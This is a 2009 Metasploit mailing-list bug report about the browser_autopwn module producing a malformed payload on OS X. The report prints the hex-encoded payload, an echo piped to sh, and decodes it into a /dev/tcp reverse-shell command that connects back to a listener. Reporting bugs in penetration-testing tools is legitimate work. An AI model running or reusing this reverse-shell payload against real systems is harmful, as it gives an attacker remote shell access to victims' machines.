Metasploit mailing list archives
browser_autopwn
From: ricardo.teixas at gmail.com (Ricardo F. Teixeira)
Date: Mon, 17 Aug 2009 17:24:19 +0100
When using browser_autopwn in OS X 10.5.X the payload created contains invalid parameters for the echo binary. maggie:msf ricardo$ sudo svn update At revision 6956. [*] Using URL: http://0.0.0.0:8080/ads [*] Local IP: http://192.168.1.254:8080/ads [*] Server started. [*] Request '/ads' from 192.168.1.254:61740 ... [*] JavaScript Report: MacOSX:undefined:undefined:pt-pt::Safari:4.0.3: [*] No database, using targetcache instead [*] Responding with exploits adding: ie4Is1Y4.mov (deflated 54%) adding: __MACOSX/._ie4Is1Y4.mov (deflated 87%) ... maggie:msf ricardo$ cat ~/Downloads/GKxYpjjw.mov /bin/echo -ne '\x30\x3c\x26\x31\x30\x37\x2d\x3b\x65\x78\x65\x63\x20\x31\x30\x37\x3c\x3e\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x32\x35\x34\x2f\x34\x31\x34\x38\x36\x3b\x73\x68\x20\x3c\x26\x31\x30\x37\x20\x3e\x26\x31\x30\x37\x20\x32\x3e\x26\x31\x30\x37'|sh maggie:msf ricardo$ man echo ECHO(1) BSD General Commands Manual ECHO(1) NAME echo -- write arguments to the standard output SYNOPSIS echo [-n] [string ...] Checking the hex characters in payload: 0<&107-;exec 107<>/dev/tcp/192.168.1.254/41486;sh <&107 >&107 2>&107 Could someone fix it? :) Thanks -- Ricardo F. Teixeira uid: 0x5BBD1456
Current thread:
- browser_autopwn Ricardo F. Teixeira (Aug 17)
- browser_autopwn HD Moore (Aug 17)
- Message not available
- browser_autopwn Ricardo F. Teixeira (Aug 17)
- Message not available
- browser_autopwn HD Moore (Aug 17)